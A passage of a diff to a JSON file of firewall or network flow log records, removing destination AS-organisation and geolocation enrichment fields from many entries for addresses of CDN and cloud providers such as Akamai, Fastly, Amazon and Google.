 "client.port": 53001,
 "destination.address": "152.195.55.192",
- "destination.as.number": 15133,
- "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "152.195.55.192",
 "destination.nat.ip": "152.195.55.192",
@@ -1896,13 +1770,6 @@
 "client.nat.port": 52731,
 "client.port": 53002,
 "destination.address": "152.195.55.192",
- "destination.as.number": 15133,
- "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "152.195.55.192",
 "destination.nat.ip": "152.195.55.192",
@@ -2001,13 +1868,6 @@
 "client.nat.port": 15165,
 "client.port": 53003,
 "destination.address": "152.195.55.192",
- "destination.as.number": 15133,
- "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "152.195.55.192",
 "destination.nat.ip": "152.195.55.192",
@@ -2106,13 +1966,6 @@
 "client.nat.port": 53918,
 "client.port": 53004,
 "destination.address": "23.72.137.131",
- "destination.as.number": 20940,
- "destination.as.organization.name": "Akamai International B.V.",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "23.72.137.131",
 "destination.nat.ip": "23.72.137.131",
@@ -2211,13 +2064,6 @@
 "client.nat.port": 40792,
 "client.port": 53000,
 "destination.address": "152.195.55.192",
- "destination.as.number": 15133,
- "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "152.195.55.192",
 "destination.nat.ip": "152.195.55.192",
@@ -2316,13 +2162,6 @@
 "client.nat.port": 54044,
 "client.port": 53006,
 "destination.address": "152.195.55.192",
- "destination.as.number": 15133,
- "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "152.195.55.192",
 "destination.nat.ip": "152.195.55.192",
@@ -2421,13 +2260,6 @@
 "client.nat.port": 19544,
 "client.port": 53007,
 "destination.address": "152.195.55.192",
- "destination.as.number": 15133,
- "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "152.195.55.192",
 "destination.nat.ip": "152.195.55.192",
@@ -2526,13 +2358,6 @@
 "client.nat.port": 13462,
 "client.port": 53008,
 "destination.address": "152.195.55.192",
- "destination.as.number": 15133,
- "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "152.195.55.192",
 "destination.nat.ip": "152.195.55.192",
@@ -2631,13 +2456,6 @@
 "client.nat.port": 44892,
 "client.port": 53010,
 "destination.address": "152.195.55.192",
- "destination.as.number": 15133,
- "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "152.195.55.192",
 "destination.nat.ip": "152.195.55.192",
@@ -2736,13 +2554,6 @@
 "client.nat.port": 16487,
 "client.port": 53011,
 "destination.address": "152.195.55.192",
- "destination.as.number": 15133,
- "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "152.195.55.192",
 "destination.nat.ip": "152.195.55.192",
@@ -2841,13 +2652,6 @@
 "client.nat.port": 23952,
 "client.port": 53012,
 "destination.address": "152.195.55.192",
- "destination.as.number": 15133,
- "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "152.195.55.192",
 "destination.nat.ip": "152.195.55.192",
@@ -2946,13 +2750,6 @@
 "client.nat.port": 2810,
 "client.port": 53013,
 "destination.address": "152.195.55.192",
- "destination.as.number": 15133,
- "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "152.195.55.192",
 "destination.nat.ip": "152.195.55.192",
@@ -3051,13 +2848,6 @@
 "client.nat.port": 13272,
 "client.port": 53014,
 "destination.address": "152.195.55.192",
- "destination.as.number": 15133,
- "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "152.195.55.192",
 "destination.nat.ip": "152.195.55.192",
@@ -3156,13 +2946,6 @@
 "client.nat.port": 8663,
 "client.port": 53022,
 "destination.address": "152.195.55.192",
- "destination.as.number": 15133,
- "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "152.195.55.192",
 "destination.nat.ip": "152.195.55.192",
@@ -3261,13 +3044,6 @@
 "client.nat.port": 55738,
 "client.port": 53023,
 "destination.address": "152.195.55.192",
- "destination.as.number": 15133,
- "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "152.195.55.192",
 "destination.nat.ip": "152.195.55.192",
@@ -3366,13 +3142,6 @@
 "client.nat.port": 10650,
 "client.port": 53024,
 "destination.address": "152.195.55.192",
- "destination.as.number": 15133,
- "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "152.195.55.192",
 "destination.nat.ip": "152.195.55.192",
@@ -3471,13 +3240,6 @@
 "client.nat.port": 44087,
 "client.port": 53025,
 "destination.address": "152.195.55.192",
- "destination.as.number": 15133,
- "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "152.195.55.192",
 "destination.nat.ip": "152.195.55.192",
@@ -3576,13 +3338,6 @@
 "client.nat.port": 15915,
 "client.port": 53026,
 "destination.address": "152.195.55.192",
- "destination.as.number": 15133,
- "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "152.195.55.192",
 "destination.nat.ip": "152.195.55.192",
@@ -3681,13 +3436,6 @@
 "client.nat.port": 41165,
 "client.port": 53041,
 "destination.address": "151.101.2.2",
- "destination.as.number": 54113,
- "destination.as.organization.name": "Fastly",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "151.101.2.2",
 "destination.nat.ip": "151.101.2.2",
@@ -3786,17 +3534,7 @@
 "client.nat.port": 54133,
 "client.port": 53040,
 "destination.address": "54.192.7.152",
- "destination.as.number": 16509,
- "destination.as.organization.name": "Amazon.com, Inc.",
- "destination.geo.city_name": "Seattle",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 47.6109,
- "destination.geo.location.lon": -122.3303,
 "destination.geo.name": "United States",
- "destination.geo.region_iso_code": "US-WA",
- "destination.geo.region_name": "Washington",
 "destination.ip": "54.192.7.152",
 "destination.nat.ip": "54.192.7.152",
 "destination.nat.port": 443,
@@ -3894,17 +3632,7 @@
 "client.nat.port": 8485,
 "client.port": 53093,
 "destination.address": "52.4.120.175",
- "destination.as.number": 14618,
- "destination.as.organization.name": "Amazon.com, Inc.",
- "destination.geo.city_name": "Ashburn",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 39.0481,
- "destination.geo.location.lon": -77.4728,
 "destination.geo.name": "United States",
- "destination.geo.region_iso_code": "US-VA",
- "destination.geo.region_name": "Virginia",
 "destination.ip": "52.4.120.175",
 "destination.nat.ip": "52.4.120.175",
 "destination.nat.port": 443,
@@ -4002,17 +3730,7 @@
 "client.nat.port": 12496,
 "client.port": 53094,
 "destination.address": "52.4.120.175",
- "destination.as.number": 14618,
- "destination.as.organization.name": "Amazon.com, Inc.",
- "destination.geo.city_name": "Ashburn",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 39.0481,
- "destination.geo.location.lon": -77.4728,
 "destination.geo.name": "United States",
- "destination.geo.region_iso_code": "US-VA",
- "destination.geo.region_name": "Virginia",
 "destination.ip": "52.4.120.175",
 "destination.nat.ip": "52.4.120.175",
 "destination.nat.port": 443,
@@ -4110,17 +3828,7 @@
 "client.nat.port": 17029,
 "client.port": 53095,
 "destination.address": "52.4.120.175",
- "destination.as.number": 14618,
- "destination.as.organization.name": "Amazon.com, Inc.",
- "destination.geo.city_name": "Ashburn",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 39.0481,
- "destination.geo.location.lon": -77.4728,
 "destination.geo.name": "United States",
- "destination.geo.region_iso_code": "US-VA",
- "destination.geo.region_name": "Virginia",
 "destination.ip": "52.4.120.175",
 "destination.nat.ip": "52.4.120.175",
 "destination.nat.port": 443,
@@ -4218,17 +3926,7 @@
 "client.nat.port": 23696,
 "client.port": 53096,
 "destination.address": "52.4.120.175",
- "destination.as.number": 14618,
- "destination.as.organization.name": "Amazon.com, Inc.",
- "destination.geo.city_name": "Ashburn",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 39.0481,
- "destination.geo.location.lon": -77.4728,
 "destination.geo.name": "United States",
- "destination.geo.region_iso_code": "US-VA",
- "destination.geo.region_name": "Virginia",
 "destination.ip": "52.4.120.175",
 "destination.nat.ip": "52.4.120.175",
 "destination.nat.port": 443,
@@ -4326,17 +4024,7 @@
 "client.nat.port": 34769,
 "client.port": 53097,
 "destination.address": "52.4.120.175",
- "destination.as.number": 14618,
- "destination.as.organization.name": "Amazon.com, Inc.",
- "destination.geo.city_name": "Ashburn",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 39.0481,
- "destination.geo.location.lon": -77.4728,
 "destination.geo.name": "United States",
- "destination.geo.region_iso_code": "US-VA",
- "destination.geo.region_name": "Virginia",
 "destination.ip": "52.4.120.175",
 "destination.nat.ip": "52.4.120.175",
 "destination.nat.port": 443,
@@ -4434,17 +4122,7 @@
 "client.nat.port": 22486,
 "client.port": 53099,
 "destination.address": "52.4.120.175",
- "destination.as.number": 14618,
- "destination.as.organization.name": "Amazon.com, Inc.",
- "destination.geo.city_name": "Ashburn",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 39.0481,
- "destination.geo.location.lon": -77.4728,
 "destination.geo.name": "United States",
- "destination.geo.region_iso_code": "US-VA",
- "destination.geo.region_name": "Virginia",
 "destination.ip": "52.4.120.175",
 "destination.nat.ip": "52.4.120.175",
 "destination.nat.port": 443,
@@ -4542,17 +4220,7 @@
 "client.nat.port": 12894,
 "client.port": 53100,
 "destination.address": "52.4.120.175",
- "destination.as.number": 14618,
- "destination.as.organization.name": "Amazon.com, Inc.",
- "destination.geo.city_name": "Ashburn",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 39.0481,
- "destination.geo.location.lon": -77.4728,
 "destination.geo.name": "United States",
- "destination.geo.region_iso_code": "US-VA",
- "destination.geo.region_name": "Virginia",
 "destination.ip": "52.4.120.175",
 "destination.nat.ip": "52.4.120.175",
 "destination.nat.port": 443,
@@ -4650,17 +4318,7 @@
 "client.nat.port": 62348,
 "client.port": 53101,
 "destination.address": "52.4.120.175",
- "destination.as.number": 14618,
- "destination.as.organization.name": "Amazon.com, Inc.",
- "destination.geo.city_name": "Ashburn",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 39.0481,
- "destination.geo.location.lon": -77.4728,
 "destination.geo.name": "United States",
- "destination.geo.region_iso_code": "US-VA",
- "destination.geo.region_name": "Virginia",
 "destination.ip": "52.4.120.175",
 "destination.nat.ip": "52.4.120.175",
 "destination.nat.port": 443,
@@ -4758,17 +4416,7 @@
 "client.nat.port": 6224,
 "client.port": 53104,
 "destination.address": "52.4.120.175",
- "destination.as.number": 14618,
- "destination.as.organization.name": "Amazon.com, Inc.",
- "destination.geo.city_name": "Ashburn",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 39.0481,
- "destination.geo.location.lon": -77.4728,
 "destination.geo.name": "United States",
- "destination.geo.region_iso_code": "US-VA",
- "destination.geo.region_name": "Virginia",
 "destination.ip": "52.4.120.175",
 "destination.nat.ip": "52.4.120.175",
 "destination.nat.port": 443,
@@ -4866,17 +4514,7 @@
 "client.nat.port": 44120,
 "client.port": 53107,
 "destination.address": "52.4.120.175",
- "destination.as.number": 14618,
- "destination.as.organization.name": "Amazon.com, Inc.",
- "destination.geo.city_name": "Ashburn",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 39.0481,
- "destination.geo.location.lon": -77.4728,
 "destination.geo.name": "United States",
- "destination.geo.region_iso_code": "US-VA",
- "destination.geo.region_name": "Virginia",
 "destination.ip": "52.4.120.175",
 "destination.nat.ip": "52.4.120.175",
 "destination.nat.port": 443,
@@ -4974,17 +4612,7 @@
 "client.nat.port": 44228,
 "client.port": 53108,
 "destination.address": "52.4.120.175",
- "destination.as.number": 14618,
- "destination.as.organization.name": "Amazon.com, Inc.",
- "destination.geo.city_name": "Ashburn",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 39.0481,
- "destination.geo.location.lon": -77.4728,
 "destination.geo.name": "United States",
- "destination.geo.region_iso_code": "US-VA",
- "destination.geo.region_name": "Virginia",
 "destination.ip": "52.4.120.175",
 "destination.nat.ip": "52.4.120.175",
 "destination.nat.port": 443,
@@ -5082,17 +4710,7 @@
 "client.nat.port": 31322,
 "client.port": 53109,
 "destination.address": "52.4.120.175",
- "destination.as.number": 14618,
- "destination.as.organization.name": "Amazon.com, Inc.",
- "destination.geo.city_name": "Ashburn",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 39.0481,
- "destination.geo.location.lon": -77.4728,
 "destination.geo.name": "United States",
- "destination.geo.region_iso_code": "US-VA",
- "destination.geo.region_name": "Virginia",
 "destination.ip": "52.4.120.175",
 "destination.nat.ip": "52.4.120.175",
 "destination.nat.port": 443,
@@ -5190,17 +4808,7 @@
 "client.nat.port": 1672,
 "client.port": 53118,
 "destination.address": "216.58.194.98",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
- "destination.geo.city_name": "Mountain View",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.3861,
- "destination.geo.location.lon": -122.0839,
 "destination.geo.name": "United States",
- "destination.geo.region_iso_code": "US-CA",
- "destination.geo.region_name": "California",
 "destination.ip": "216.58.194.98",
 "destination.nat.ip": "216.58.194.98",
 "destination.nat.port": 443,
@@ -5298,13 +4906,6 @@
 "client.nat.port": 20801,
 "client.port": 53126,
 "destination.address": "23.72.145.245",
- "destination.as.number": 16625,
- "destination.as.organization.name": "Akamai Technologies, Inc.",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "23.72.145.245",
 "destination.nat.ip": "23.72.145.245",
@@ -5403,13 +5004,6 @@
 "client.nat.port": 24533,
 "client.port": 53127,
 "destination.address": "23.72.145.245",
- "destination.as.number": 16625,
- "destination.as.organization.name": "Akamai Technologies, Inc.",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "23.72.145.245",
 "destination.nat.ip": "23.72.145.245",
@@ -5508,13 +5102,6 @@
 "client.nat.port": 30150,
 "client.port": 53128,
 "destination.address": "23.72.145.245",
- "destination.as.number": 16625,
- "destination.as.organization.name": "Akamai Technologies, Inc.",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "23.72.145.245",
 "destination.nat.ip": "23.72.145.245",
@@ -5613,13 +5200,6 @@
 "client.nat.port": 36305,
 "client.port": 53129,
 "destination.address": "23.72.145.245",
- "destination.as.number": 16625,
- "destination.as.organization.name": "Akamai Technologies, Inc.",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "23.72.145.245",
 "destination.nat.ip": "23.72.145.245",
@@ -5718,13 +5298,6 @@
 "client.nat.port": 42682,
 "client.port": 53130,
 "destination.address": "23.72.145.245",
- "destination.as.number": 16625,
- "destination.as.organization.name": "Akamai Technologies, Inc.",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "23.72.145.245",
 "destination.nat.ip": "23.72.145.245",
@@ -5823,13 +5396,6 @@
 "client.nat.port": 22530,
 "client.port": 53131,
 "destination.address": "23.72.145.245",
- "destination.as.number": 16625,
- "destination.as.organization.name": "Akamai Technologies, Inc.",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "23.72.145.245",
 "destination.nat.ip": "23.72.145.245",
@@ -5928,13 +5494,6 @@
 "client.nat.port": 43713,
 "client.port": 53132,
 "destination.address": "23.72.145.245",
- "destination.as.number": 16625,
- "destination.as.organization.name": "Akamai Technologies, Inc.",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "23.72.145.245",
 "destination.nat.ip": "23.72.145.245",
@@ -6033,13 +5592,6 @@
 "client.nat.port": 60608,
 "client.port": 53133,
 "destination.address": "23.72.145.245",
- "destination.as.number": 16625,
- "destination.as.organization.name": "Akamai Technologies, Inc.",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "23.72.145.245",
 "destination.nat.ip": "23.72.145.245",
@@ -6138,13 +5690,6 @@
 "client.nat.port": 9302,
 "client.port": 53134,
 "destination.address": "23.72.145.245",
- "destination.as.number": 16625,
- "destination.as.organization.name": "Akamai Technologies, Inc.",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "23.72.145.245",
 "destination.nat.ip": "23.72.145.245",
@@ -6243,13 +5788,6 @@
 "client.nat.port": 11634,
 "client.port": 53135,
 "destination.address": "23.72.145.245",
- "destination.as.number": 16625,
- "destination.as.organization.name": "Akamai Technologies, Inc.",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "23.72.145.245",
 "destination.nat.ip": "23.72.145.245",
@@ -6348,17 +5886,7 @@
 "client.nat.port": 30818,
 "client.port": 53152,
 "destination.address": "54.209.101.70",
- "destination.as.number": 14618,
- "destination.as.organization.name": "Amazon.com, Inc.",
- "destination.geo.city_name": "Ashburn",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 39.0481,
- "destination.geo.location.lon": -77.4728,
 "destination.geo.name": "United States",
- "destination.geo.region_iso_code": "US-VA",
- "destination.geo.region_name": "Virginia",
 "destination.ip": "54.209.101.70",
 "destination.nat.ip": "54.209.101.70",
 "destination.nat.port": 443,
@@ -6456,17 +5984,7 @@
 "client.nat.port": 64260,
 "client.port": 53155,
 "destination.address": "54.209.101.70",
- "destination.as.number": 14618,
- "destination.as.organization.name": "Amazon.com, Inc.",
- "destination.geo.city_name": "Ashburn",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 39.0481,
- "destination.geo.location.lon": -77.4728,
 "destination.geo.name": "United States",
- "destination.geo.region_iso_code": "US-VA",
- "destination.geo.region_name": "Virginia",
 "destination.ip": "54.209.101.70",
 "destination.nat.ip": "54.209.101.70",
 "destination.nat.port": 443,
@@ -6564,17 +6082,7 @@ "client.nat.port": 7071, "client.port": 53158, "destination.address": "54.209.101.70", - "destination.as.number": 14618, - "destination.as.organization.name": "Amazon.com, Inc.", - "destination.geo.city_name": "Ashburn", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 39.0481, - "destination.geo.location.lon": -77.4728, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "54.209.101.70", "destination.nat.ip": "54.209.101.70", "destination.nat.port": 443, @@ -6672,17 +6180,7 @@ "client.nat.port": 4512, "client.port": 53160, "destination.address": "54.209.101.70", - "destination.as.number": 14618, - "destination.as.organization.name": "Amazon.com, Inc.", - "destination.geo.city_name": "Ashburn", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 39.0481, - "destination.geo.location.lon": -77.4728, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "54.209.101.70", "destination.nat.ip": "54.209.101.70", "destination.nat.port": 443, 
@@ -6780,17 +6278,7 @@ "client.nat.port": 3422, "client.port": 53161, "destination.address": "54.209.101.70", - "destination.as.number": 14618, - "destination.as.organization.name": "Amazon.com, Inc.", - "destination.geo.city_name": "Ashburn", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 39.0481, - "destination.geo.location.lon": -77.4728, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "54.209.101.70", "destination.nat.ip": "54.209.101.70", "destination.nat.port": 443, @@ -6888,17 +6376,7 @@ "client.nat.port": 4651, "client.port": 53162, "destination.address": "54.209.101.70", - "destination.as.number": 14618, - "destination.as.organization.name": "Amazon.com, Inc.", - "destination.geo.city_name": "Ashburn", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 39.0481, - "destination.geo.location.lon": -77.4728, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "54.209.101.70", "destination.nat.ip": "54.209.101.70", "destination.nat.port": 443, 
@@ -6996,17 +6474,7 @@ "client.nat.port": 19068, "client.port": 53163, "destination.address": "54.209.101.70", - "destination.as.number": 14618, - "destination.as.organization.name": "Amazon.com, Inc.", - "destination.geo.city_name": "Ashburn", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 39.0481, - "destination.geo.location.lon": -77.4728, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "54.209.101.70", "destination.nat.ip": "54.209.101.70", "destination.nat.port": 443, @@ -7104,17 +6572,7 @@ "client.nat.port": 5831, "client.port": 53164, "destination.address": "54.209.101.70", - "destination.as.number": 14618, - "destination.as.organization.name": "Amazon.com, Inc.", - "destination.geo.city_name": "Ashburn", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 39.0481, - "destination.geo.location.lon": -77.4728, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "54.209.101.70", "destination.nat.ip": "54.209.101.70", "destination.nat.port": 443, 
@@ -7212,17 +6670,7 @@ "client.nat.port": 7084, "client.port": 53165, "destination.address": "54.209.101.70", - "destination.as.number": 14618, - "destination.as.organization.name": "Amazon.com, Inc.", - "destination.geo.city_name": "Ashburn", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 39.0481, - "destination.geo.location.lon": -77.4728, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "54.209.101.70", "destination.nat.ip": "54.209.101.70", "destination.nat.port": 443, @@ -7320,17 +6768,7 @@ "client.nat.port": 18633, "client.port": 53166, "destination.address": "54.209.101.70", - "destination.as.number": 14618, - "destination.as.organization.name": "Amazon.com, Inc.", - "destination.geo.city_name": "Ashburn", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 39.0481, - "destination.geo.location.lon": -77.4728, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", "destination.ip": "54.209.101.70", "destination.nat.ip": "54.209.101.70", "destination.nat.port": 443, 
